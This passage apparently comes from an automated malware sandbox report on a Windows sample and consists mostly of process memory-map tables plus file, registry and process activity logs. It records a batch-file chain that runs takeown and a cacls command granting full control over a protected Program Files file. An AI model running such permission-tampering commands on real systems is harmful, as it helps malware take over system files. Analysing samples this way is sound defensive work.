| bcryptprimitives.dll | 0x7ffc543d0000 | 0x7ffc5443afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc54610000 | 0x7ffc5461efff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffc54f80000 | 0x7ffc55032fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffc55280000 | 0x7ffc552b5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffc55380000 | 0x7ffc554dbfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc554e0000 | 0x7ffc5562dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffc55910000 | 0x7ffc559cdfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc56f10000 | 0x7ffc57094fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc571d0000 | 0x7ffc5744bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffc57970000 | 0x7ffc57a14fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Process #95: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #95 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Mail\recorder.exe"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:08, Reason: Child Process |
| Unmonitor | End Time: 00:03:29, Reason: Self Terminated |
| Monitor Duration | 00:01:21 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x524 |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
BF8
0x
ECC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000000e0000 | 0x000e0000 | 0x000fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000effff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00101fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00103fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000110000 | 0x00110000 | 0x00123fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0016ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x00273fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000280000 | 0x00280000 | 0x00280fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x00291fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x002a0000 | 0x0035dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x0443ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004440000 | 0x04440000 | 0x0468ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004440000 | 0x04440000 | 0x0453ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004590000 | 0x04590000 | 0x0468ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004690000 | 0x04690000 | 0x047fffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04800000 | 0x04b36fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x741b0000 | 0x741b7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f290000 | 0x7f290000 | 0x7f38ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f390000 | 0x7f390000 | 0x7f3b2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f3b8000 | 0x7f3b8000 | 0x7f3bafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f3bb000 | 0x7f3bb000 | 0x7f3bdfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f3be000 | 0x7f3be000 | 0x7f3befff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f3bf000 | 0x7f3bf000 | 0x7f3bffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 70 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 49 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 19 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 57 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 184, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0x930, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x958, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0x4f4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "recorder.exe" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "recorder.exe" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #96: dllhost.exe
0
0
| Information | Value |
|---|---|
| ID | #96 |
| File Name | c:\windows\system32\dllhost.exe |
| Command Line | C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:09, Reason: Child Process |
| Unmonitor | End Time: 00:02:27, Reason: Self Terminated |
| Monitor Duration | 00:00:18 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb60 |
| Parent PID | 0x23c (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
368
0x
FF0
0x
EC8
0x
E34
0x
90C
0x
E30
0x
F98
0x
A24
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x0000006ecdd70000 | 0x6ecdd70000 | 0x6ecdd8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000006ecdd70000 | 0x6ecdd70000 | 0x6ecdd7ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000006ecdd80000 | 0x6ecdd80000 | 0x6ecdd86fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000006ecdd90000 | 0x6ecdd90000 | 0x6ecdda3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000006ecddb0000 | 0x6ecddb0000 | 0x6ecdeaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000006ecdeb0000 | 0x6ecdeb0000 | 0x6ecdeb3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000006ecdec0000 | 0x6ecdec0000 | 0x6ecdec1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x6ecded0000 | 0x6ecdf8dfff | Memory Mapped File | r |
|
|
|
- |
| rpcss.dll | 0x6ecdf90000 | 0x6ece065fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000006ecdf90000 | 0x6ecdf90000 | 0x6ecdf90fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000006ecdfa0000 | 0x6ecdfa0000 | 0x6ecdfa6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000006ecdfb0000 | 0x6ecdfb0000 | 0x6ecdfb0fff | Pagefile Backed Memory | r |
|
|
|
- |
| imm32.dll | 0x6ecdfc0000 | 0x6ecdff3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000006ecdfc0000 | 0x6ecdfc0000 | 0x6ecdfc0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000006ecdfd0000 | 0x6ecdfd0000 | 0x6ecdfd0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000006ecdfe0000 | 0x6ecdfe0000 | 0x6ece03ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000006ecdfe0000 | 0x6ecdfe0000 | 0x6ecdfe2fff | Pagefile Backed Memory | r |
|
|
|
- |
| windowsshell.manifest | 0x6ecdff0000 | 0x6ecdff0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000006ece000000 | 0x6ece000000 | 0x6ece001fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000006ece030000 | 0x6ece030000 | 0x6ece03ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006ece080000 | 0x6ece080000 | 0x6ece17ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006ece180000 | 0x6ece180000 | 0x6ece27ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006ece280000 | 0x6ece280000 | 0x6ece44ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006ece280000 | 0x6ece280000 | 0x6ece37ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006ece440000 | 0x6ece440000 | 0x6ece44ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x6ece450000 | 0x6ece786fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000006ece790000 | 0x6ece790000 | 0x6ece88ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006ece890000 | 0x6ece890000 | 0x6ece98ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006ece990000 | 0x6ece990000 | 0x6ecea8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000006ecea90000 | 0x6ecea90000 | 0x6ecec17fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000006ecec20000 | 0x6ecec20000 | 0x6eceda0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000006ecedb0000 | 0x6ecedb0000 | 0x6ed01affff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000006ed01b0000 | 0x6ed01b0000 | 0x6ed02affff | Private Memory | rw |
|
|
|
- |
| ole32.dll | 0x6ed02b0000 | 0x6ed03f0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00007df5ff8c0000 | 0x7df5ff8c0000 | 0x7ff5ff8bffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff75719c000 | 0x7ff75719c000 | 0x7ff75719dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff75719e000 | 0x7ff75719e000 | 0x7ff75719ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff7571a0000 | 0x7ff7571a0000 | 0x7ff75729ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff7572a0000 | 0x7ff7572a0000 | 0x7ff7572c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff7572c4000 | 0x7ff7572c4000 | 0x7ff7572c5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7572c6000 | 0x7ff7572c6000 | 0x7ff7572c7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7572c8000 | 0x7ff7572c8000 | 0x7ff7572c9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7572ca000 | 0x7ff7572ca000 | 0x7ff7572cbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7572cc000 | 0x7ff7572cc000 | 0x7ff7572cdfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7572ce000 | 0x7ff7572ce000 | 0x7ff7572cefff | Private Memory | rw |
|
|
|
- |
| dllhost.exe | 0x7ff757890000 | 0x7ff757896fff | Memory Mapped File | rwx |
|
|
|
- |
| thumbcache.dll | 0x7ffc47230000 | 0x7ffc4727afff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7ffc4cbd0000 | 0x7ffc4ce43fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ffc511b0000 | 0x7ffc51332fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7ffc52d70000 | 0x7ffc52e05fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffc53a90000 | 0x7ffc53ac2fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffc54210000 | 0x7ffc54226fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffc54280000 | 0x7ffc5428afff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc543a0000 | 0x7ffc543c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc543d0000 | 0x7ffc5443afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc54610000 | 0x7ffc5461efff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffc54f80000 | 0x7ffc55032fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffc55280000 | 0x7ffc552b5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffc55380000 | 0x7ffc554dbfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc554e0000 | 0x7ffc5562dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffc55910000 | 0x7ffc559cdfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc56f10000 | 0x7ffc57094fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc571d0000 | 0x7ffc5744bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffc57970000 | 0x7ffc57a14fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Process #98: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #98 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\en-US\Journal.exe.mui" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:11, Reason: Child Process |
| Unmonitor | End Time: 00:02:20, Reason: Self Terminated |
| Monitor Duration | 00:00:09 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe8c |
| Parent PID | 0x150 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
4E8
0x
B24
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000008e0000 | 0x008e0000 | 0x008fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000008e0000 | 0x008e0000 | 0x008effff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000008f0000 | 0x008f0000 | 0x008f3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000900000 | 0x00900000 | 0x00901fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000900000 | 0x00900000 | 0x00903fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000910000 | 0x00910000 | 0x00923fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000930000 | 0x00930000 | 0x0096ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000970000 | 0x00970000 | 0x009affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000009b0000 | 0x009b0000 | 0x009b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009c0000 | 0x009c0000 | 0x009c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000009d0000 | 0x009d0000 | 0x009d1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000009e0000 | 0x009e0000 | 0x00a1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a20000 | 0x00a20000 | 0x00a5ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x00a60000 | 0x00a61fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000a90000 | 0x00a90000 | 0x00a9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000aa0000 | 0x00aa0000 | 0x00c1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000aa0000 | 0x00aa0000 | 0x00aeffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b20000 | 0x00b20000 | 0x00c1ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00c20000 | 0x00cddfff | Memory Mapped File | r |
|
|
|
- |
| sortdefault.nls | 0x00ce0000 | 0x01016fff | Memory Mapped File | r |
|
|
|
- |
| cacls.exe | 0x01040000 | 0x01049fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x0504ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x73850000 | 0x73877fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
